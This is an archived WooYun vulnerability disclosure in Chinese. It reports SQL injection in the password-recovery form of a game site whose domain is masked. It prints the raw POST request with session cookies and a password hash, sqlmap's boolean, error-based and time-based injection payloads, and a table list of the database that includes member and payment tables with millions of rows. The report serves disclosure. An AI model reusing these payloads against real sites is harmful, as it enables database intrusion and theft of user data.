乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-02: 细节已通知厂商并且等待厂商处理中 2016-04-06: 厂商已经确认,细节仅向厂商公开 2016-04-16: 细节向核心白帽子及相关领域专家公开 2016-04-26: 细节向普通白帽子公开 2016-05-06: 细节向实习白帽子公开 2016-05-21: 细节向公众公开
RT!
http://**.**.**.**/user_findpwd.php?t=email
POST http://**.**.**.**/user_findpwd.php?t=doemail HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/user_findpwd.php?t=emailCookie: Hm_lvt_878250ef6d9058d8708994370fb5132c=1459546008; Hm_lpvt_878250ef6d9058d8708994370fb5132c=1459549499; PHPSESSID=144d2qapb7kfrshd3jdrgv1m76; bdshare_firstime=1459549345620; mrand=243969013; msign=e777f9591b90b0ec41549c14f3e2ea66; MemberName=chinasea; NickName=sea; MemberId=3945514; MemberPass=3d3e9afcb73af50299c8ff572daebb46; bmforumerboardidnum=219Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 77data%5Bname%5D=1111&data%5Bemail%5D=111111111%**.**.**.**&sub=%E6%8F%90%E4%BA%A4
data%5Bname%5D参数存在注入
sqlmap identified the following injection point(s) with a total of 358 HTTP(s) requests:---Parameter: data[name] (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: data[name]=-1228' OR 5159=5159#&data[email]=111111111@**.**.**.**&sub=%E6%8F%90%E4%BA%A4 Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: data[name]=-5681' OR 1 GROUP BY CONCAT(0x71706a6b71,(SELECT (CASE WHEN (3827=3827) THEN 1 ELSE 0 END)),0x716b767671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&data[email]=111111111@**.**.**.**&sub=%E6%8F%90%E4%BA%A4 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment) Payload: data[name]=1111' AND (SELECT * FROM (SELECT(SLEEP(5)))XyKJ)#&data[email]=111111111@**.**.**.**&sub=%E6%8F%90%E4%BA%A4---[06:38:13] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3, Nginxback-end DBMS: MySQL 5.0.12
数据如下:
+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| ebogame_member_login | 4026283 || ebogame_member | 2350328 || ebogame_activation | 826836 || ebogame_member_integral | 691708 || ebogame_charge_20160118 | 465322 || pre_ucenter_members | 388347 || bbs_userlist | 340566 || ebogame_member_info | 292054 || ebogame_member_serv | 292044 || ebogame_member_char | 241395 || ebogame_charge | 175353 || api_send_mail | 61235 || ebogame_advertising_click | 52260 || pre_common_district | 45051 || ebogame_charge_copy | 43282 || ebogame_questions | 36047 || pre_forum_post | 27728 || ebogame_game_gift_code_17173 | 20000 || pre_home_notification | 14236 || pre_common_credit_rule_log | 13014 || pre_forum_thread | 12229 || pre_forum_threadpartake | 10744 || pre_forum_threadmod | 9011 || pre_common_member_count | 8182 || pre_common_member_field_forum | 8182 || pre_common_member_field_home | 8182 || pre_common_member_profile | 8182 || pre_common_member_status | 8182 || pre_common_member | 8174 || pre_common_onlinetime | 6443 || ebogame_game_code | 6210 || bbs_posts | 5157 || ebogame_game_gift_code | 5000 || pre_forum_statlog | 4990 || pre_ucenter_memberfields | 4811 || ebogame_member_price | 3442 || ebogame_game_gift_code_ | 3000 || ebogame_content | 2640 || ebogame_extension_member | 2591 || ebogame_news | 2288 || bbs_apclog | 2061 || ebogame_question_reply | 1668 || pre_forum_attachment | 1566 || pre_forum_pollvoter | 1455 || bbs_actlogs | 1449 || pre_common_member_crime | 1239 || pre_forum_modwork | 1003 || pre_common_stat | 899 || bbs_threads | 874 || pre_forum_thread_moderate | 653 || ebogame_charge_heepay | 591 || bbs_primsg | 517 || pre_common_member_action_log | 496 || pre_ucenter_pm_indexes | 419 || pre_forum_threadimage | 405 || pre_common_setting | 392 || ebogame_game_areas | 358 || pre_forum_polloption | 273 || pre_ucenter_pm_members | 244 || pre_forum_attachment_1 | 222 || pre_forum_attachment_3 | 212 || pre_forum_attachment_4 | 180 || pre_forum_post_tableid | 174 || pre_forum_attachment_9 | 168 || pre_forum_attachment_5 | 161 || sglj_extension | 154 || ebogame_advertising | 151 || pre_ucenter_pm_lists | 129 || pre_forum_attachment_7 | 124 || pre_common_tagitem | 118 || bbs_ugoptlist | 115 || pre_ucenter_pm_messages_0 | 114 || pre_forum_threaddisablepos | 110 || pre_forum_attachment_6 | 106 || pre_common_block_style | 103 || pre_forum_attachment_unused | 103 || pre_forum_attachment_0 | 102 || pre_forum_attachment_2 | 102 || pre_common_syscache | 95 || pre_ucenter_notelist | 90 || pre_common_smiley | 85 || pre_forum_attachment_8 | 85 || pre_forum_rsscache | 80 || pre_ucenter_pm_messages_3 | 70 || pre_common_admincp_perm | 67 || pre_common_member_profile_setting | 51 || pre_forum_poll | 49 || pre_ucenter_pm_messages_7 | 49 || pre_common_tag | 48 || pre_common_nav | 47 || pre_common_stylevar | 45 || pre_ucenter_newpm | 40 || pre_forum_forumfield | 38 || pre_forum_forum | 37 || pre_common_credit_log | 36 || pre_ucenter_pm_messages_5 | 35 || ebogame_category | 33 || ebogame_price | 33 || pre_home_friend | 32 || pre_common_credit_rule | 31 || pre_ucenter_pm_messages_2 | 31 || pre_home_friend_request | 30 || pre_ucenter_pm_messages_6 | 29 || pre_ucenter_settings | 26 || bbs_emoticons | 25 || ebogame_games | 25 || pre_ucenter_pm_messages_4 | 25 || bbs_search | 23 || pre_ucenter_pm_messages_8 | 23 || ebogame_extension_percent | 22 || pre_ucenter_pm_messages_9 | 22 || ebogame_extension_settlemen | 21 || pre_ucenter_pm_messages_1 | 21 || pre_common_cron | 18 || pre_common_usergroup | 16 || pre_common_usergroup_field | 16 || pre_home_friendlog | 16 || bbs_forumdata | 15 || bbs_tags | 15 || pre_home_click | 15 || pre_common_report | 14 || pre_forum_threadclosed | 14 || bbs_contacts | 13 || pre_forum_replycredit | 13 || bbs_levels | 12 || pre_common_banned | 12 || pre_common_session | 11 || pre_forum_poststick | 11 || ebogame_game_gift_info_17173 | 10 || pre_forum_medal | 10 || ebogame_integral | 9 || pre_common_plugin | 9 || pre_home_favorite | 9 || bbs_usergroup | 8 || bbs_polls | 7 || pre_forum_warning | 7 || ebogame_extension | 6 || pre_common_pluginvar | 6 || pre_forum_moderator | 6 || pre_forum_typeoption | 6 || pre_common_admincp_group | 5 || pre_common_friendlink | 5 || pre_common_admingroup | 4 || pre_common_advertisement | 4 || pre_forum_bbcode | 4 || pre_forum_onlinelist | 4 || ebogame_game_gift_info_ | 3 || pre_common_admincp_member | 3 || pre_common_failedlogin | 3 || pre_forum_grouplevel | 3 || pre_forum_imagetype | 3 || pre_common_admincp_cmenu | 2 || pre_common_block | 2 || pre_common_credit_rule_log_field | 2 || pre_common_diy_data | 2 || pre_common_patch | 2 || pre_common_regip | 2 || pre_common_template_block | 2 || pre_common_word_type | 2 || pre_home_poke | 2 || pre_home_pokearchive | 2 || pre_mobile_setting | 2 || bbs_favorites | 1 || bbs_lastest | 1 || pre_common_admincp_session | 1 || pre_common_cache | 1 || pre_common_statuser | 1 || pre_common_style | 1 || pre_common_template | 1 || pre_ucenter_admins | 1 || pre_ucenter_applications | 1 || pre_ucenter_failedlogins | 1 |+-----------------------------------+---------+
危害等级:中
漏洞Rank:10
确认时间:2016-04-06 11:41
CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无
